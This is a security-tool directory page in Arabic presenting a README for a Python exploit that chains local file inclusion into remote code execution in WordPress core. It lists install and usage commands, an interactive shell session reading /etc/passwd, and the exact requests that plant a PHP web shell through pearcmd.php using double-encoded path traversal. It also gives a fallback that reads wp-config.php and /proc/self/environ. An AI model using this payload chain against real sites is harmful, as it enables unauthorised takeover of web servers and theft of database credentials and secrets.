Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/zyphorixofficialmain-lab/cve-2026-87902
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتما بعد الاستغلالأمن الويباختبار الاختراقأداة الوصول عن بعدتطوير الحمولات
GitHubzyphorixofficialmain-lab/cve-2026-87902

cve-2026-87902

مستغل Python لـ CVE-2026-87902، سلسلة LFI-to-RCE في نواة WordPress. يحدد الإصدارات، ويكتب PHP shell عبر pearcmd، ويوفر تنفيذ الأوامر أو LFI كخيار احتياطي.

عرض المستودع
1منذ 12س 53دلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

cve-2026-87902

CVE-2026-87902 – استغلال WordPress Core من LFI إلى RCE (إصدار الفرض التلقائي)

maked by alfaris

⚠️ تحذير قانوني استخدامه ضد أنظمة لا تملكها أو ليس لديك إذن كتابي باختبارها غير قانوني ويعاقب عليه بموجب قوانين الجرائم الإلكترونية. المؤلف لا يتحمل أي مسؤولية عن سوء الاستخدام.


📌 ملخص الثغرة

الحقلالقيمة
CVECVE-2026-87902
النوعتضمين ملف محلي (LFI) → تنفيذ كود عن بُعد (RCE)
CWECWE-98
CVSS v3.19.2 (حرجة)
ناقل الهجومالشبكة (بدون مصادقة)
المتأثرWordPress 4.7.0 – 7.1.1
المُصحَّحWordPress 7.1.2 (والنسخ الخلفية حتى 4.7.37)
السبب الجذريget_page_template() لا تستدعي validate_file() بعد فك ترميز URL لمعامل pagename، مما يسمح بالتجاوز المزدوج المُرمَّز (%252E%252E%252F) لتجاوز التعقيم وتضمين ملفات .php عشوائية خارج دليل القالب.

شروط RCE المسبقة

لتحقيق RCE كامل، يجب أن تتحقق جميع الشروط التالية:

  1. إصدار WordPress بين 4.7.0 و 7.1.1
  2. القالب النشط يحتوي على دليل page-* في المستوى الأعلى (مثل page-templates/)
  3. وجود صفحة منشورة واحدة على الأقل
  4. وجود pearcmd.php وقابليته للقراءة من قبل مستخدم خادم الويب (افتراضي في صور PHP Docker الرسمية والعديد من تثبيتات cPanel مع PHP < 8.5)
  5. تفعيل register_argc_argv=On في PHP (افتراضي في PHP < 8.5)
  6. نظام التشغيل المضيف هو Linux (صيغة التجاوز في Windows مختلفة)

إذا كان أي من هذه الشروط مفقودًا، سيرجع الاستغلال إلى قراءة الملفات عبر LFI فقط.


📂 الملفات

exploit.py # سكربت الاستغلال الرئيسي README.md # هذا الملف report.json # (اختياري) تقرير المخرجات عند استخدام -o

⚙️ المتطلبات

  • Python 3.8+
  • مكتبة requests

التثبيت:

root@kitploit:~
apt update
apt upgrade
apt install python
apt install git
root@kitploit:~
pip install requests
root@kitploit:~
git clone https://github.com/zyphorixofficialmain-lab/cve-2026-87902
cd cve-2026-87902
  1. فحص أساسي (مفصّل)
root@kitploit:~
python3 exploit.py -t https://site.com -v

سيقوم هذا بـ:

· بصمة إصدار WordPress والقالب النشط · التحقق من نطاق الإصدارات المصابة · تحديد معرّف صفحة منشورة (REST → sitemap → القوة الغاشمة) · محاولة كتابة shell PHP عبر pearcmd.php · محاولة تضمين الـ shell وتنفيذ id · إذا فشل RCE، يرجع إلى LFI على الملفات الحساسة

  1. تنفيذ أمر واحد
root@kitploit:~
python3 exploit.py -t https://site.com -c "id"
  1. shell تفاعلي (فقط إذا نجح RCE)
root@kitploit:~
python3 exploit.py -t https://site.com -i -v

داخل الـ shell:

root@kitploit:~
wp$ id
wp$ uname -a
wp$ cat /etc/passwd
wp$ exit
  1. حفظ التقرير بصيغة JSON
root@kitploit:~
python3 exploit.py -t https://site.com -o report.json -v
  1. دمج الخيارات
root@kitploit:~
python3 exploit.py -t https://site.com -c "whoami" -o report.json -v

🧾 مرجع CLI

العلم الطويل الوصف -t --target مطلوب. رابط WordPress الهدف (بدون شرطة مائلة في النهاية). -c --command تنفيذ أمر shell واحد بعد RCE. -i --interactive فتح shell تفاعلي بعد RCE. -v --verbose طباعة التقدم المفصّل. -o --output حفظ التقرير النهائي بصيغة JSON في المسار المحدد. -h --help عرض المساعدة.

🔄 مسار الاستغلال

root@kitploit:~
[1] البصمة
      ├─ إصدار WordPress (meta generator / asset ?ver=)
      └─ القالب النشط (/wp-content/themes/<name>/)

[2] التحقق من الإصدار
      └─ 4.7.0 – 7.1.1 ? متابعة : تحذير ومتابعة

[3] إيجاد معرّف الصفحة
      ├─ REST: /wp-json/wp/v2/pages
      ├─ Sitemap: /wp-sitemap.xml
      └─ القوة الغاشمة: /?page_id=1..30

[4] التحقق من دليل page-*
      ├─ page-templates
      ├─ page-template
      ├─ pages
      ├─ templates
      └─ page

[5] كتابة shell عبر pearcmd
      └─ POST /?+config-create+/&page_id=<id>&pagename=templates%252F..%252F..%252Fusr%252Flocal%252Flib%252Fphp%252Fpearcmd
         body: root=<?php system($_GET['c']); ?>

[6] تضمين shell
      └─ GET /?page_id=<id>&pagename=templates%252F..%252F..%252Ftmp%252F<shell>.php&c=id

[7] LFI الاحتياطي (إذا فشل RCE)
      ├─ /etc/passwd
      ├─ /etc/hostname
      ├─ /proc/self/environ
      ├─ /proc/version
      ├─ wp-config.php
      └─ متغيرات ../..
تنزيل الأداة